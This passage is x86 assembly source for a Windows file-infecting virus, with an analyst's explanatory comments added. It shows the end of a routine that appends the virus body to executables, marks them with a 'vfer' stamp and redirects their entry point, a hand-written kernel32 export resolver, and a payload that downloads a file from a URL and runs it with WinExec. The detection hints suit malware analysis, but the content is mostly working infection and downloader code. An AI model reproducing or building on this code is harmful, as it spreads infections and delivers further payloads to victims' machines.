mov ecx,[ebp+sec_align]
xor edx,edx
xchg eax,ebx                            ; eax = new size, ebx = NT header address
cdq
div ecx
test edx,edx                            ; remainder?
je @@@4
inc eax                                 ; round up
@@@4:
mul ecx
xchg eax,ebx                            ; eax = NT header address, ebx = rounded size
mov [eax+50h],ebx
mov dword ptr [eax+8h],'vfer'           ; stamp the infection marker into TimeDateStamp
cld
mov ecx,[ebp+Vlen]
mov edi,[ebp+oldEnd]
add edi,[ebp+HFmapviewoffile]           ; file offset -> view address
lea esi,[ebp+VirusStart]
rep movsb                               ; append the virus body (code, data and the oldEip just recorded)
xor eax,eax
sub edi,[ebp+HFmapviewoffile]           ; edi = new end-of-file offset
push 0h                                 ; dwMoveMethod = FILE_BEGIN
push 0h                                 ; lpDistanceToMoveHigh = NULL
push edi
push [ebp+FileHandle]
call [ebp+_SetFilePointer]
push [ebp+FileHandle]
call [ebp+_SetEndOfFile]                ; size the file to the appended length
@Close:
call UnMapFile
call UnCreateMap
call UnOpenFile
ret
;*****************************************************************end of the .exe infection routine****************************************************************
GetFunctionAddress PROC
;-----------------------------------------------------------------------
; GetFunctionAddress: resolve a kernel32 export by name by walking the
; export directory directly (GetProcAddress itself is resolved through
; this routine).
; In:   esi -> NUL-terminated export name
;       [ebp+Kernel32Address] = kernel32 image base (located in HEAD)
; Out:  eax = absolute address of the export
; Clobbers: ebx, ecx, edx, edi, esi, flags; stack balanced on return.
; Walk: export directory RVA at NT+78h (DataDirectory[0]);
; AddressOfNames (+20h) is scanned linearly, each name compared with
; the wanted string up to the wanted string's NUL; the matching index
; picks a WORD from AddressOfNameOrdinals (+24h), which indexes
; AddressOfFunctions (+1Ch).
; Analyst note: hand-rolled export parsing with no import table entry
; for GetProcAddress is a strong static hint of self-relocating or
; shellcode-style code; pair it with the "MZ" scan in HEAD when
; triaging.
;-----------------------------------------------------------------------
mov eax, [ebp+Kernel32Address]          ;EAX = Kernel32 Address
mov ebx, [eax+3Ch]                      ; e_lfanew
add ebx, eax                            ; -> NT headers
add ebx, 120                            ; +78h: DataDirectory[0].VirtualAddress (export table)
mov ebx, [ebx]
add ebx, eax                            ;EBX = Export Address
xor edx, edx                            ; edx = running index into the name table
mov ecx, [ebx+32]                       ; AddressOfNames RVA
add ecx, eax                            ; ecx -> name pointer table
push esi                                ; keep the wanted name and the index across the compare loop
push edx
CompareNext:
pop edx
pop esi
inc edx                                 ; next entry (1-based until GetAddress)
mov edi, [ecx]
add edi, eax                            ; edi -> this export's name
add ecx, 4
push esi
push edx
CompareName:
mov dl, [edi]
mov dh, [esi]
cmp dl, dh
jne CompareNext                         ; mismatch: try the next name
inc edi
inc esi
cmp byte ptr [esi], 0                   ; wanted string exhausted -> match
je GetAddress
jmp CompareName
GetAddress:
pop edx
pop esi
dec edx                                 ; back to a 0-based index
shl edx, 1                              ; ordinals are WORDs
mov ecx, [ebx+36]                       ; AddressOfNameOrdinals RVA
add ecx, eax
add ecx, edx
xor edx, edx
mov dx, [ecx]                           ; ordinal
shl edx, 2                              ; function RVAs are DWORDs
mov ecx, [ebx+28]                       ; AddressOfFunctions RVA
add ecx, eax
add ecx, edx
add eax, [ecx]                          ; base + function RVA
ret
GetFunctionAddress ENDP
MapFile proc ; ECX = file size (author); used as dwNumberOfBytesToMap
; MapViewOfFile(HFcreatefilemapping, FILE_MAP_WRITE, 0, 0, ecx)
; Out: eax = view base address, or 0 on failure.
xor eax,eax
push ecx                                ; dwNumberOfBytesToMap
push eax                                ; dwFileOffsetLow
push eax                                ; dwFileOffsetHigh
push 00000002h                          ; FILE_MAP_WRITE
push dword ptr [ebp+HFcreatefilemapping]
call [ebp+_MapViewOfFile]
ret
MapFile endp
CreateMap proc ;ECX = mapping size (author wrote "virus size"; InfectFiles passes FileSizeLow+1000h)
; CreateFileMappingA(FileHandle, NULL, PAGE_READWRITE, 0, ecx, NULL)
; Out: eax = mapping handle, or 0 on failure.
xor eax,eax
push eax                                ; lpName = NULL
push ecx                                ; dwMaximumSizeLow
push eax                                ; dwMaximumSizeHigh
push 00000004h                          ; PAGE_READWRITE
push eax                                ; lpFileMappingAttributes = NULL
push dword ptr [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
OpenFile proc
; CreateFileA(esi, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, NULL,
;             OPEN_EXISTING, 0, NULL)
; In:  esi -> NUL-terminated path (author's note literally says "esi points at the handle")
; Out: eax = handle, or INVALID_HANDLE_VALUE (-1)
xor eax,eax
push eax                                ; hTemplateFile = NULL
push eax                                ; dwFlagsAndAttributes = 0
push 00000003h                          ; OPEN_EXISTING
push eax                                ; lpSecurityAttributes = NULL
inc eax
push eax                                ; dwShareMode = FILE_SHARE_READ (1)
push 80000000h or 40000000h             ; GENERIC_READ | GENERIC_WRITE
push esi                                ; lpFileName
call [ebp+_CreateFileA]                 ; open the named file
ret
OpenFile endp
OpenFileE proc
; CreateFileA(esi, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_WRITE, NULL,
;             OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)
; Like OpenFile, but creates the file when it does not exist. Used for
; web pages (SpreadWebPage) and the downloader marker file (GoToWork2).
; In:  esi -> NUL-terminated path
; Out: eax = handle, or INVALID_HANDLE_VALUE (-1)
xor eax,eax
push eax                                ; hTemplateFile = NULL
push 00000080h                          ; FILE_ATTRIBUTE_NORMAL
push 00000004h                          ; OPEN_ALWAYS
push eax                                ; lpSecurityAttributes = NULL
push 00000002h                          ; FILE_SHARE_WRITE
push 80000000h or 40000000h             ; GENERIC_READ | GENERIC_WRITE
push esi                                ; lpFileName
call [ebp+_CreateFileA]                 ; open or create the named file
ret
OpenFileE endp
SetJmpOep:
; Template copied into the host's section slack by InfectFiles: the
; opcode of JMP rel32 (E9). The 4-byte displacement is written
; separately right after it.
db 0E9h
SetJmpOepEnd:
UnMapFile proc
; UnmapViewOfFile(HFmapviewoffile). Clobbers eax (return value).
push [ebp+HFmapviewoffile]
call [ebp+_UnmapViewOfFile]
ret
UnMapFile endp
UnCreateMap proc
; CloseHandle(HFcreatefilemapping). Clobbers eax (return value).
push [ebp+HFcreatefilemapping]
call [ebp+_CloseHandle]
ret
UnCreateMap endp
UnOpenFile proc
; CloseHandle(FileHandle). Clobbers eax (return value).
push [ebp+FileHandle]
call [ebp+_CloseHandle]
ret
UnOpenFile endp
GoToWork:
;-----------------------------------------------------------------------
; GoToWork / GoToWork2: payload stage.
; GoToWork sets InfectedFlag so that, after the payload, control returns
; to the host program (CheckBeforBack/GoBack) instead of exiting;
; GoToWork2 is the entry reached from the end of the drive loop in
; Spread. Where GoToWork itself is jumped to is outside this part of
; the file.
; Payload: if the marker file DownloaderFlag does not exist
; (SetFileAttributesA fails), URLDownloadToFileA fetches DownName (URL)
; into DownedName, the marker file is created with OpenFileE, and the
; download is started with WinExec(SW_SHOWNORMAL). Then either jump to
; the host's original entry point (GoBack) or ExitProcess(0).
; Shared error tail: error_MapFile -> error_CreateMap -> error_Final
; release the view, the mapping and the file handle in that order and
; ret (used by InfectFiles).
; Analyst note: the downloader is the real second-stage mechanism;
; URLDownloadToFileA followed by WinExec from a non-browser process is
; a classic detection pair, and the DownloaderFlag marker file is a
; host artefact worth checking during triage. GoBack jumps to the
; absolute ImageBase+EntryPoint captured at infection time, so an
; ASLR-relocated host would not resume cleanly.
;-----------------------------------------------------------------------
;********************************************************************************************
;the payload code starts here (author)
;first check whether the download has already happened (author)
mov byte ptr [ebp+InfectedFlag],1       ; return to the host afterwards (see CheckBeforBack)
GoToWork2:
push 80h                                ; FILE_ATTRIBUTE_NORMAL
lea esi,[ebp+DownloaderFlag]
push esi
call [ebp+_SetFileAttributesA]          ; succeeds only if the marker file exists
test eax,eax                            ; (author: "if it failed")
jnz CheckBeforBack                      ; marker present: already downloaded, skip
;(author: "if several programs are to be downloaded")
xor eax,eax
push eax                                ; lpfnCB = NULL
push eax                                ; dwReserved = 0
lea esi,[ebp+DownedName]
push esi                                ; szFileName: local destination path
lea esi,[ebp+DownName]
push esi                                ; szURL
push eax                                ; pCaller = NULL
call [ebp+_URLDownloadToFile]
;download finished: set the flag by creating the marker file (author)
lea esi,[ebp+DownloaderFlag]
call OpenFileE                          ; OPEN_ALWAYS creates it
push eax
call [ebp+_CloseHandle]
;flag set (author); run the downloaded file
push 1                                  ; uCmdShow = SW_SHOWNORMAL
lea esi,[ebp+DownedName]
push esi                                ; lpCmdLine
call [ebp+_WinExec]
CheckBeforBack:
cmp byte ptr [ebp+InfectedFlag],1
jnz @Exit                               ; not running from an infected host: just exit
;hand control back to the host (author: "the code to execute")
GoBack:
mov eax,dword ptr[ebp+oldEip]           ; ImageBase + original AddressOfEntryPoint recorded by InfectFiles
jmp eax
error_MapFile:
call UnMapFile                          ; release the view, then fall through
error_CreateMap:
call UnCreateMap                        ; close the mapping, then fall through
error_Final:
call UnOpenFile                         ; close the file
ret
@Exit:
push 0h                                 ; uExitCode
call [ebp+_ExitProcess]
VirusEnd:
end VirusMain